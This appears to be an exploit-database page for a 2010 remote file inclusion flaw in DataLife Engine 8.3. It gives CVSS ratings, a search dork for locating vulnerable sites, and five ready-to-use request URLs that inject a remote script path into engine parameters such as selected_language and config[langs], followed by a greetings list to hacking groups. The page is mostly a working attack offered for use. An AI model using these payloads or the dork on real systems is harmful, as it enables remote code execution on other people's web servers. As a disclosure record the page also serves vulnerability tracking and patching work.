DataLife Engine 8.3 RFI Vulnerability

2010.05.26
Credit: indoushka
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

======================================================================================== | # Title : DataLife Engine 8.3 RFI Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iq-ty.com/vb | # Script Home : http://villehost.net/files/DataLife%20Engine%208.3%20Full%20English%20UTF-8%20Encoded%20-%20www.cms-pedia.com.rar (pass=www.cms-pedia.com) | # Dork : Powered by CMS Pedia © 2009 (DataLife Engine Support © 2009. CMS Pedia) | # Tested on : windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : RFI ====================== Exploit By indoushka ================================= # Exploit : 1- RFI http://localhost/upload/engine/inc/include/init.php?selected_language=http://localhost/c.txt? http://localhost/upload/engine/inc/help.php?config[langs]=http://localhost/c.txt? http://localhost/upload/engine/ajax/pm.php?config[lang_=[EV!L] http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt? http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt? ================================ Dz-Ghost Team ======================================================== Greetz : Ñ æ Ï ÈÈ 22 + ãÑ + ÊÑÊ + Ì + ã + Êã + ÏÑæã + ãÛ + æÌÏ + ÃÛÏÑ + æã + æåÑ Exploit-db Team (loneferret+Exploits+dookie2000ca) all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net ------------------------------------------------------------------------------------------------------------

Referencje:

http://xforce.iss.net/xforce/xfdb/55757
http://www.securityfocus.com/bid/37851
http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top